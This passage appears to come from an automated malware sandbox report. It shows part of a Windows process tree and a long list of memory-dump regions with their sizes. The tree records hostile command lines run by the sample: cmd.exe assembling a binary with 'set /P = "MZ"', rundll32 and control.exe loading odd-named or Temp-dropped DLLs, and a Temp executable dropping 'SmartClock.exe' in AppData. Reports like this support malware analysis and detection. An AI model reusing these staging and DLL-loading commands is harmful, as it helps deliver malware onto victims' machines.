                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>cxQOi7.xVE"
                                                                                                                                              1⤵
                                                                                                                                                PID:964
                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\TSiZ8.~
                                                                                                                                                1⤵
                                                                                                                                                  PID:1884
                                                                                                                                                • C:\Windows\SysWOW64\control.exe
                                                                                                                                                  control ..\TSiZ8.~
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2096
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" ecHo "
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2180
                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                      1⤵
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      PID:2396
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2652
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1928
                                                                                                                                                        • C:\Windows\system32\makecab.exe
                                                                                                                                                          "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211114101744.log C:\Windows\Logs\CBS\CbsPersist_20211114101744.cab
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2820
                                                                                                                                                          • C:\Windows\system32\taskeng.exe
                                                                                                                                                            taskeng.exe {55C1C84D-2549-4BCE-B866-7852B605F99E} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2204
                                                                                                                                                            • C:\Windows\system32\taskeng.exe
                                                                                                                                                              taskeng.exe {49C40F3B-C3BB-46EF-AE80-8018987CAEA9} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1608
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7206.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7206.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1940
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2280

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • memory/360-224-0x0000000000D60000-0x0000000000D61000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/360-238-0x000000001B560000-0x000000001B562000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8KB

                                                                                                                                                                  • memory/640-383-0x0000000000400000-0x0000000000451000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    324KB

                                                                                                                                                                  • memory/640-370-0x0000000000230000-0x0000000000281000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    324KB

                                                                                                                                                                  • memory/640-372-0x0000000000320000-0x0000000000363000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    268KB

                                                                                                                                                                  • memory/668-357-0x0000000000270000-0x0000000000271000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/740-361-0x0000000000D60000-0x0000000000D62000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8KB

                                                                                                                                                                  • memory/792-364-0x000000001B0F0000-0x000000001B0F2000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8KB

                                                                                                                                                                  • memory/868-397-0x0000000000A50000-0x0000000000A9D000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    308KB

                                                                                                                                                                  • memory/868-398-0x0000000002100000-0x0000000002172000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    456KB

                                                                                                                                                                  • memory/968-55-0x00000000756B1000-0x00000000756B3000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8KB

                                                                                                                                                                  • memory/1056-355-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/1108-202-0x0000000000040000-0x000000000066D000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.2MB

                                                                                                                                                                  • memory/1156-245-0x0000000003EC0000-0x000000000400C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.3MB

                                                                                                                                                                  • memory/1216-222-0x0000000001EB0000-0x0000000001EB1000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/1216-237-0x0000000001EB2000-0x0000000001EB4000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8KB

                                                                                                                                                                  • memory/1216-227-0x0000000001EB1000-0x0000000001EB2000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/1236-198-0x0000000000400000-0x0000000000450000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    320KB

                                                                                                                                                                  • memory/1236-199-0x0000000000400000-0x0000000000450000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    320KB

                                                                                                                                                                  • memory/1260-442-0x0000000002A20000-0x0000000002A36000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    88KB

                                                                                                                                                                  • memory/1388-154-0x0000000000400000-0x000000000046D000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    436KB

                                                                                                                                                                  • memory/1400-385-0x0000000000210000-0x0000000000290000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    512KB

                                                                                                                                                                  • memory/1492-349-0x0000000000260000-0x0000000000261000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/1568-97-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    152KB

                                                                                                                                                                  • memory/1568-92-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.5MB

                                                                                                                                                                  • memory/1568-96-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    152KB

                                                                                                                                                                  • memory/1568-98-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    572KB

                                                                                                                                                                  • memory/1568-88-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.5MB

                                                                                                                                                                  • memory/1568-86-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    572KB

                                                                                                                                                                  • memory/1568-85-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    572KB

                                                                                                                                                                  • memory/1568-93-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    100KB

                                                                                                                                                                  • memory/1568-94-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.5MB

                                                                                                                                                                  • memory/1568-95-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    100KB

                                                                                                                                                                  • memory/1568-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.5MB

                                                                                                                                                                  • memory/1568-84-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    572KB

                                                                                                                                                                  • memory/1568-91-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    100KB

                                                                                                                                                                  • memory/1568-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.5MB

                                                                                                                                                                  • memory/1568-87-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    100KB

                                                                                                                                                                  • memory/1628-213-0x0000000001070000-0x000000000169D000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    6.2MB

                                                                                                                                                                  • memory/1668-223-0x0000000000310000-0x0000000000311000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/1668-226-0x0000000000660000-0x0000000000661000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/1668-209-0x0000000000320000-0x0000000000321000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/1736-253-0x0000000003D00000-0x0000000003E4C000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.3MB

                                                                                                                                                                  • memory/1756-228-0x0000000004B90000-0x0000000004B91000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/1756-210-0x00000000011D0000-0x00000000011D1000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/1768-338-0x0000000000270000-0x00000000002AA000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    232KB

                                                                                                                                                                  • memory/1768-337-0x0000000000270000-0x00000000002AA000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    232KB

                                                                                                                                                                  • memory/1796-428-0x0000000000240000-0x0000000000248000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    32KB

                                                                                                                                                                  • memory/1796-432-0x0000000000400000-0x0000000000440000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    256KB

                                                                                                                                                                  • memory/1796-430-0x0000000000250000-0x0000000000259000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    36KB

                                                                                                                                                                  • memory/1824-394-0x0000000000400000-0x0000000000CBD000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8.7MB

                                                                                                                                                                  • memory/1824-393-0x0000000002FA0000-0x0000000003842000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8.6MB

                                                                                                                                                                  • memory/1824-392-0x0000000002B90000-0x0000000002F9F000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4.1MB

                                                                                                                                                                  • memory/1904-384-0x000000001B2F2000-0x000000001B2F4000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8KB

                                                                                                                                                                  • memory/1904-382-0x0000000000120000-0x0000000000341000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.1MB

                                                                                                                                                                  • memory/1928-399-0x0000000000460000-0x00000000004D2000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    456KB

                                                                                                                                                                  • memory/1928-400-0x0000000001C10000-0x0000000001C2B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    108KB

                                                                                                                                                                  • memory/1928-401-0x0000000002830000-0x0000000002935000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.0MB

                                                                                                                                                                  • memory/2100-407-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2172-310-0x00000000008F0000-0x00000000008F1000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2176-426-0x0000000000430000-0x0000000000431000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2316-425-0x00000000005E0000-0x00000000005E1000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2368-373-0x000000001B100000-0x000000001B102000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8KB

                                                                                                                                                                  • memory/2372-236-0x0000000000B00000-0x0000000000B60000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    384KB

                                                                                                                                                                  • memory/2372-235-0x0000000000400000-0x0000000000AFA000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    7.0MB

                                                                                                                                                                  • memory/2440-348-0x000000001B170000-0x000000001B172000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8KB

                                                                                                                                                                  • memory/2556-353-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    80KB

                                                                                                                                                                  • memory/2568-391-0x00000000007E0000-0x00000000007E1000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2600-445-0x0000000001260000-0x0000000001261000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2652-330-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    80KB

                                                                                                                                                                  • memory/2652-395-0x0000000001D40000-0x0000000001E41000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    1.0MB

                                                                                                                                                                  • memory/2652-396-0x0000000000430000-0x000000000048D000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    372KB

                                                                                                                                                                  • memory/2676-381-0x000000001AB80000-0x000000001AB82000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    8KB

                                                                                                                                                                  • memory/2696-306-0x0000000005640000-0x0000000005641000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2728-304-0x0000000000590000-0x0000000000591000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2764-366-0x00000000054B0000-0x00000000054B1000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2792-296-0x00000000048B0000-0x00000000048B1000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2956-406-0x0000000004960000-0x0000000004961000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    4KB

                                                                                                                                                                  • memory/2964-346-0x00000000004E0000-0x000000000055B000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    492KB

                                                                                                                                                                  • memory/2964-347-0x00000000009C0000-0x0000000000A95000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    852KB

                                                                                                                                                                  • memory/2964-351-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    864KB